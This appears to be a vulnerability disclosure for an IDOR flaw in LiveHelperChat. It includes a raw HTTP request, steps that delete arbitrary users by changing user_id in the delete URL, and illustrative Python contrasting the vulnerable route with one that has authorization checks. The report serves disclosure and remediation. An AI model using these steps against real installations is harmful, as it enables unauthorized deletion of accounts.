LiveHelperChat is vulnerable to an Insecure Direct Object Reference (IDOR) vulnerability. The system's authorization functionality does not prevent one user from deleting another user by modifying the user_id identifying the user.

Each user has a user_id (1,2,3,…). A malicious authorized user can delete any other user by changing the value of user_id in the GET request that deletes a user.
HTTP request
GET /site_admin/user/delete/3/(csfr)/6252584dffdb5fd120f461a3f36d3bf5 HTTP/1.1
Host: demo.livehelperchat.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://demo.livehelperchat.com/site_admin/user/userlist
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=n7c0ok7vbicornv5g10fc38ein
1. Go to the user list (https://demo.livehelperchat.com/site_admin/user/userlist).
2. Click on the delete button of any user (for example, the user with user_id=3).
3. Intercept the request; it now looks like /site_admin/user/delete/3/(csfr)/<csrf_value>
4. Change the value of user_id in the request from 3 to another value (1,2,4,…); any user_id that exists in the user list works.
5. Forward the request; the user with the new user_id will be deleted.
This vulnerability is capable of deleting any user in the user list.
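The root cause described above is that the delete route validates the CSRF token but never decides whether the requesting user may act on the user_id in the path. The following added example (illustrative code, not LiveHelperChat's; the user table, the "admin"/"operator" roles and the audit list are assumptions) models a route of the same shape both with and without that object-level authorization check:

```python
"""Added illustration of a missing object-level authorization check on a
"delete user" route shaped like the one in the report. Not LiveHelperChat
code; the user table, role names and session layout are assumptions."""
import hmac
import re
from dataclasses import dataclass

# Route shape from the report: /site_admin/user/delete/<user_id>/(csfr)/<token>
DELETE_ROUTE = re.compile(r"^/site_admin/user/delete/(\d+)/\(csfr\)/([0-9a-f]{32})$")


@dataclass
class User:
    user_id: int
    role: str  # assumed roles: "admin" may manage users, "operator" may not


def parse_delete_request(path: str):
    """Return (target user_id, csrf token) from the request path, or None."""
    m = DELETE_ROUTE.match(path)
    return (int(m.group(1)), m.group(2)) if m else None


def delete_user_vulnerable(actor: User, path: str, session_csrf: str, users: dict) -> str:
    """Mirrors the reported behaviour: the CSRF token is checked, but nothing
    asks whether *actor* is allowed to delete the user named in the path."""
    parsed = parse_delete_request(path)
    if parsed is None:
        return "bad_request"
    target_id, token = parsed
    if not hmac.compare_digest(token, session_csrf):
        return "csrf_rejected"
    return "deleted" if users.pop(target_id, None) is not None else "not_found"


def delete_user_fixed(actor: User, path: str, session_csrf: str, users: dict, audit: list) -> str:
    """Same route with authorization added. The CSRF check only proves the
    request came from the actor's own session; whether the actor may act on
    this particular target is a separate decision and is logged when denied."""
    parsed = parse_delete_request(path)
    if parsed is None:
        return "bad_request"
    target_id, token = parsed
    if not hmac.compare_digest(token, session_csrf):
        return "csrf_rejected"
    if actor.role != "admin" or target_id == actor.user_id:
        # Denials are worth recording: repeated denials from one session
        # after a legitimate delete are a clear parameter-tampering signal.
        audit.append(f"denied: user_id={actor.user_id} tried to delete user_id={target_id}")
        return "forbidden"
    if users.pop(target_id, None) is None:
        return "not_found"
    audit.append(f"user_id={actor.user_id} deleted user_id={target_id}")
    return "deleted"
```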